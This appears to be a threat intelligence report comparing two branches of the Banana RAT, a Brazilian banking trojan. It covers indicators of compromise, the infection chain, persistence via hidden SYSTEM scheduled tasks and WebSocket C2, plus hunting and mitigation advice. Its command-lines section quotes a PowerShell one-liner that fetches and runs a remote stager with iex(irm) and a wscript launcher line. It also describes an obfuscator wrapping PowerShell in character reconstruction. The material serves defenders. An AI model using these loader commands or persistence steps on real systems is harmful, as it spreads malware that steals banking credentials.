Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN
An exposed public index on 198.245.53.26 revealed two evolutionary branches of Banana RAT, a Brazilian banking-oriented RAT. The older branch (May 2026) used static ETW-themed installation paths and a pseudo-Microsoft C2 domain (c.windowns-cdn.com), while the newer branch (June 2026) shifted to randomized install identifiers, VBS-assisted persistence via hidden SYSTEM scheduled tasks, and WebSocket C2 over host-specific testewin.com subdomains derived from the victim's MachineGuid. Exposed backend scripts (servidorcompletopool.py, ofuscador.py) indicate an automated polymorphic payload generation platform. A shared fallback IP (149.56.12.51) anchors both branches to the same operator.
- domain52facc3b24f8bad9c5c56819e385f3a1[.]testewin[.]comSpecific host-derived C2 subdomain observed in newer branch detonation; MD5 hash of victim MachineGuid prepended to testewin.com
- domaincdn[.]testewin[.]comFallback C2 domain embedded in newer branch runtime payload alongside fallback IP 149.56.12.51
- domainc[.]windowns-cdn[.]comOlder branch C2 domain using pseudo-Microsoft naming with a typo ('windowns'); resolves to 149.56.12.51:443
- domaintestewin[.]comNewer branch C2 apex domain; host-specific subdomains are generated as MD5(MachineGuid).testewin.com for WebSocket C2 over wss://...:443/agent
- ip104[.]21[.]39[.]21Cloudflare edge IP resolving for 52facc3b24f8bad9c5c56819e385f3a1.testewin.com; used to obscure backend C2 origin
- ip149[.]56[.]12[.]51Cross-branch anchor IP; serves as older branch C2 (c.windowns-cdn.com resolves here) and newer branch fallback IP embedded in runtime payload
- ip172[.]67[.]142[.]55Cloudflare edge IP resolving for 52facc3b24f8bad9c5c56819e385f3a1.testewin.com; used to obscure backend C2 origin
- ip198[.]245[.]53[.]26Primary staging host serving both older and newer Banana RAT branches; hosts st.txt, st.php, payload.php, and exposed backend tooling (servidor_completo_pool.py, ofuscador.py)
- md50b26e1d533ed19da29b1a22a2e4a1320MD5 of st.php.malw (newer branch stage-2 stager) from image metadata
- md5e3fb1120502a2945f3f0eaabc28e6d3fMD5 of Fatura-BtgPactual-22568.bat (older branch entry sample) from image metadata
- sha256443c0a821c214471d74b51093ab3d69bb9bee54ded049e5abcda2551e4f12707Older branch full payload (msedgeupdate.txt / msedge.txt); dropped to ETW-themed paths for persistence
- sha256bc4c29bc0c84ea18311fbadc508f6f3a9d84b54a456e672c2ab34d6b42f56c0cOlder branch entry sample (Fatura-BtgPactual-22568.bat); BAT-wrapped PowerShell loader that fetches st.txt from staging host
- sha256d828949ade683cf3ac6d4260f946ca33ef861035051db07d3ee79ec75dd243b2Full PowerShell payload (newer branch); matches both payload_new.php.malw from exposed server and runtime payload c9dba5b0552d879be654.txt extracted from victim host
- sha256e9d918ff5f7918cff1a3a23f3945058a66b56d6dd724066414c7e1cab95e166dNewer branch stage-2 stager (st.php.malw); fetched from 198.245.53.26/st.php and executed via PowerShell with TLS 1.2 enforcement
- urlhxxp://198[.]245[.]53[.]26/payload[.]phpStage-2 payload delivery URL used by both branches
- urlhxxp://198[.]245[.]53[.]26/st[.]phpNewer branch stage-1 stager URL fetched with TLS 1.2 enforcement
- urlhxxp://198[.]245[.]53[.]26/st[.]txtOlder branch stage-1 stager URL fetched by PowerShell one-liner via iex(irm)
Detection / Hunteropenrouter
What Happened
Security researchers discovered an exposed server that revealed how a malicious program called Banana RAT has been evolving. This malware targets Brazilian banking customers, aiming to steal financial credentials and facilitate fraud. The researchers found two versions of the malware: an older one from May 2026 that used predictable file names and a fake Microsoft domain, and a newer one from June 2026 that uses randomized names, more sophisticated persistence methods, and a different communication method that is harder to detect. The server also exposed the attackers' backend tooling, suggesting they run an automated system to generate new variants of the malware on demand. Organizations with Brazilian operations or financial sector exposure should hunt for the indicators described in this report, block the identified malicious domains and IPs, and ensure endpoint detection covers the described PowerShell and VBScript execution patterns.
Key Takeaways
- Two branches of Banana RAT were compared via an exposed server at 198.245.53.26, revealing evolution from static ETW-themed artifacts to randomized identifiers and WebSocket C2.
- The newer branch derives a host-specific C2 subdomain from MD5(MachineGuid).testewin.com, making bulk domain-level blocking harder while still using a dedicated malicious apex domain.
- A fallback IP (149.56.12.51) links both branches, serving as a reliable cross-branch pivot indicator.
- Exposed backend tooling (servidor_completo_pool.py, ofuscador.py) indicates a polymorphic MaaS payload generation platform with on-demand variant creation.
- The newer branch upgraded persistence to a SYSTEM-level hidden Scheduled Task with an HKCU Run key fallback, and moved transport from HTTPS to encrypted WebSocket (wss://.../agent).
Affected Systems
- Windows endpoints (Windows 10/11 implied via PowerShell, Scheduled Tasks, VBScript)
- Brazilian financial sector users (banking sessions, Pix-related fraud)
Vulnerabilities (CVEs)
None identified.
Attack Chain
- Initial Access: Phishing lure delivers BAT file (e.g., Fatura-BtgPactual-22568.bat) disguised as a Brazilian bank invoice
- Execution: BAT file launches hidden PowerShell that fetches stage-1 stager (st.txt or st.php) from 198.245.53.26 via iex(irm)
- Staging: Stage-1 fetches full payload from payload.php on same host; newer branch enforces TLS 1.2
- Persistence: Older branch writes to ETW-themed paths with static names; newer branch creates randomized ProgramData directory, drops VBS launcher, and registers hidden SYSTEM scheduled task with HKCU Run key fallback
- C2: Older branch connects to c.windowns-cdn.com:443 (149.56.12.51); newer branch derives MD5(MachineGuid).testewin.com and connects via WebSocket (wss://...:443/agent) through Cloudflare, with fallback to cdn.testewin.com and 149.56.12.51
- Collection: RAT performs keylogging, screen capture, session monitoring, and file enumeration targeting Brazilian banking sessions and Pix transactions
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide any detection rules, queries, or signatures. It is a behavioral and infrastructure analysis based on ANY.RUN sandbox telemetry and exposed server content.
Detection Engineering Assessment
| Dimension | Rating | Rationale |
|---|---|---|
| EDR Visibility | High | The malware relies heavily on PowerShell execution with hidden window flags, VBScript launchers via wscript.exe, scheduled task creation as SYSTEM, and file drops to non-standard ProgramData paths — all of which are well-covered by modern EDR telemetry. |
| Network Visibility | Medium | Older branch uses plain HTTP staging and direct TCP:443 C2 which is visible. Newer branch uses WebSocket over Cloudflare-fronted domains, making payload inspection harder without TLS interception. DNS queries for *.testewin.com subdomains are a strong signal if DNS logging is available. |
| Detection Difficulty | Moderate | The older branch is easy to detect due to static paths and typo domain. The newer branch's randomized naming and Cloudflare-fronted WebSocket C2 increase difficulty, but the behavioral patterns (wscript launching hidden PowerShell, SYSTEM scheduled tasks with random names, DNS queries to *.testewin.com) remain detectable with behavioral analytics. |
Required Log Sources
- PowerShell Script Block Logging (Event ID 4104)
- Windows Task Scheduler operational logs (Event ID 4698)
- Process creation events (Sysmon Event ID 1 or Windows Security 4688)
- DNS query logs
- File creation events in ProgramData and AppData (Sysmon Event ID 11)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for wscript.exe spawning powershell.exe with hidden window flags from files in ProgramData\Microsoft\ subdirectories with randomized hex-like names, consistent with T1059.005 chaining to T1059.001. | Process creation and parent-child relationships from EDR or Sysmon Event ID 1 | Execution | Low — legitimate VBS-to-PowerShell execution from randomized ProgramData paths is rare in enterprise environments. |
| Consider hunting for scheduled tasks created with SYSTEM principal and randomized hex-string task names, particularly those triggered AtStartup, as described in T1053.005. | Windows Task Scheduler operational logs (Event ID 4698) and Sysmon Event ID 1 for schtasks.exe or Register-ScheduledTask cmdlet usage | Persistence | Low to Medium — some legitimate software creates SYSTEM-level startup tasks, but randomized hex names are atypical. |
| Consider hunting for DNS queries to subdomains of testewin.com, especially 32-character hex subdomains consistent with MD5 hashes, as these indicate host-derived C2 per T1071.001. | DNS query logs, passive DNS, or network firewall logs | Command and Control | Low — testewin.com is a dedicated malicious domain with no legitimate use. |
| Consider hunting for PowerShell processes making outbound WebSocket connections (wss://) to domains with 32-character hex subdomains, as this pattern is consistent with the newer Banana RAT branch. | Network connection logs correlated with process telemetry (EDR network events or Sysmon Event ID 3) | Command and Control | Low — PowerShell initiating WebSocket sessions is uncommon in typical enterprise environments. |
| Consider hunting for processes reading MachineGuid from registry and using it to construct network destinations, as this behavior supports host-specific C2 derivation per T1082. | Registry access events (Sysmon Event ID 12/13) for HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid combined with subsequent network connections | Discovery / Command and Control | Medium — some legitimate inventory and management tools read MachineGuid, but combining it with dynamic network destination construction is suspicious. |
Control Gaps
- Signature-based AV may miss the polymorphic variants generated by the servidor_completo_pool.py backend, as each payload variant uses different obfuscation.
- Network controls without DNS-level visibility will miss the host-derived *.testewin.com subdomain pattern.
- TLS inspection is required to inspect WebSocket C2 payload content; without it, only SNI and connection metadata are visible.
- Application allow-listing for PowerShell may not catch this if PowerShell is broadly permitted in the environment.
Key Behavioral Indicators
- wscript.exe as parent of powershell.exe with -W Hidden flag
- Scheduled task with SYSTEM principal and randomized hex-string name triggered AtStartup
- PowerShell setting Net.ServicePointManager SecurityProtocol to Tls12 before irm/iex staging
- File creation under C:\ProgramData\Microsoft<hex_string>\ with .txt and .vbs extensions
- DNS queries for 32-character hex subdomains of testewin.com
- PowerShell process establishing WebSocket (wss://) connections to non-standard domains
- Registry writes to HKCU\Software\Microsoft<hex_string> containing SvcName and FileName values
False Positive Assessment
Low — the IOCs are specific to this campaign (dedicated malicious domains, exposed staging server, specific file paths and hashes). Behavioral detections for wscript-to-PowerShell execution and randomized SYSTEM scheduled tasks carry slightly higher but still low false positive risk in typical enterprise environments.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting. Consider blocking the staging IP 198.245.53.26, C2/fallback IP 149.56.12.51, and domains c.windowns-cdn.com, testewin.com, and cdn.testewin.com at your firewall, proxy, and DNS filtering layers.
- Consider hunting across endpoints for the listed SHA256 hashes and file paths, particularly in C:\ProgramData\Microsoft\ subdirectories with randomized hex names and C:\ProgramData\Microsoft\Diagnosis\ETW\ paths.
- If your EDR supports host isolation, consider isolating any endpoints showing confirmed connections to *.testewin.com or 149.56.12.51 pending investigation.
- Consider searching for scheduled tasks with randomized hex-string names running as SYSTEM with AtStartup triggers, and review any matching tasks for malicious VBS launchers.
Infrastructure Hardening
- Consider implementing DNS logging and alerting for queries to *.testewin.com subdomains, especially 32-character hex subdomains, if your DNS infrastructure supports it.
- Evaluate whether TLS inspection can be enabled for WebSocket traffic from endpoint processes, particularly powershell.exe and wscript.exe, to improve C2 visibility.
- Consider deploying network-level blocks for the testewin.com apex domain at your DNS resolver or next-gen firewall, as it is a dedicated malicious domain with no legitimate use.
- If applicable, consider restricting outbound WebSocket connections from non-browser processes to reduce the attack surface for this C2 method.
User Protection
- Consider ensuring EDR coverage is deployed on all Windows endpoints with PowerShell Script Block Logging and Sysmon configured for process creation, file creation, and scheduled task events.
- Evaluate whether application control policies can restrict wscript.exe from launching PowerShell in user and ProgramData contexts, if supported by your tooling.
- Consider enabling Attack Surface Reduction (ASR) rules if using Microsoft Defender, particularly those blocking obfuscated script execution and child process creation from Office applications.
Security Awareness
- Consider reinforcing phishing awareness training with examples of Brazilian banking-themed lures (e.g., fake invoice BAT files like Fatura-BtgPactual) targeting users in or interacting with Brazilian financial institutions.
- Consider advising users who handle Brazilian financial transactions or Pix payments to report any unexpected invoice or billing documents, especially those requiring execution of downloaded files.
- If your organization has Brazilian operations or financial sector relationships, consider circulating an advisory about this campaign's indicators to relevant teams.
MITRE ATT&CK Mapping
Execution
Persistence
Defense Evasion
Discovery
Command and Control
Additional IOCs
- Ips:
104[.]21[.]39[.]21- Cloudflare edge IP resolving for 52facc3b24f8bad9c5c56819e385f3a1.testewin.com; used to obscure backend C2 origin172[.]67[.]142[.]55- Cloudflare edge IP resolving for 52facc3b24f8bad9c5c56819e385f3a1.testewin.com; used to obscure backend C2 origin
- Urls:
hxxp://198[.]245[.]53[.]26/st.txt- Older branch stage-1 stager URL fetched by PowerShell one-liner via iex(irm)hxxp://198[.]245[.]53[.]26/st.php- Newer branch stage-1 stager URL fetched with TLS 1.2 enforcementhxxp://198[.]245[.]53[.]26/payload.php- Stage-2 payload delivery URL used by both brancheswss://52facc3b24f8bad9c5c56819e385f3a1[.]testewin[.]com:443/agent- Newer branch WebSocket C2 endpoint; protocol version 11.07-FAST-RECONNECT with magic bytes LQWP
- File Hashes:
E3FB1120502A2945F3F0EAABC28E6D3F(MD5) - MD5 of Fatura-BtgPactual-22568.bat (older branch entry sample) from image metadata0B26E1D533ED19DA29B1A22A2E4A1320(MD5) - MD5 of st.php.malw (newer branch stage-2 stager) from image metadata
- Registry Keys:
HKCU\Software\Microsoft\dc98339fa461- Newer branch registry key storing SvcName (7c70c4282dfc72fa) and FileName (c9dba5b0552d879be654) configurationHKCU\Software\Microsoft\Windows- Newer branch registry key storing CU pointer to HKCU:\Software\Microsoft\dc98339fa461HKCU\Software\Microsoft\Windows\CurrentVersion\Run- Fallback persistence location used by newer branch when not running elevated
- File Paths:
C:\Users\Public\Documents\msedge.txt- Older branch dropped payload fileC:\Users\admin\AppData\Roaming\Microsoft\Diagnosis\ETW\msedgeupdate.txt- Older branch payload in ETW-themed user pathC:\ProgramData\Microsoft\Diagnosis\ETW\msedgeupdate.txt- Older branch payload in ETW-themed system pathC:\Users\admin\AppData\Roaming\Microsoft\Diagnosis\ETW\launcher.exe- Older branch launcher executable in ETW-themed pathC:\ProgramData\Microsoft\Diagnosis\ETW\MicrosoftEdgeUpdateCore.exe- Older branch named executable masquerading as Microsoft Edge Update CoreC:\ProgramData\Microsoft\7c70c4282dfc72fa\c9dba5b0552d879be654.txt- Newer branch runtime payload in randomized ProgramData subdirectoryC:\ProgramData\Microsoft\7c70c4282dfc72fa\c9dba5b0552d.vbs- Newer branch VBS launcher for persistence via scheduled task
- Command Lines:
- Purpose: Older branch initial staging: fetch and execute stage-1 payload from staging host via PowerShell IEX | Tools:
powershell.exe| Stage: Initial Access / Execution |powershell.exe "$po='http://<host>/st.txt';iex(irm $po)" - Purpose: Older branch hidden execution of dropped payload with UAC bypass flag and ScriptBlock creation | Tools:
powershell.exe| Stage: Execution / Persistence - Purpose: Newer branch initial staging: enforce TLS 1.2, set environment flag, fetch and execute stage-1 via IEX | Tools:
powershell.exe| Stage: Initial Access / Execution - Purpose: Newer branch VBS launcher execution via wscript to trigger hidden PowerShell payload | Tools:
wscript.exe| Stage: Persistence / Execution |wscript.exe "C:\ProgramData\Microsoft\<svcname>\<filename>.vbs" - Purpose: Newer branch scheduled task creation as SYSTEM for persistence | Tools:
powershell.exe| Stage: Persistence
- Purpose: Older branch initial staging: fetch and execute stage-1 payload from staging host via PowerShell IEX | Tools:
- Other:
servidor_completo_pool.py- FastAPI-based payload distribution backend exposed on staging host; pool-based pre-generation of polymorphic variants with endpoints /proteger, /warmup, /stats, /foldersofuscador.py- Obfuscation helper script converting PowerShell commands to ASCII character reconstruction wrappers inside BAT launchers using [char[]] and iex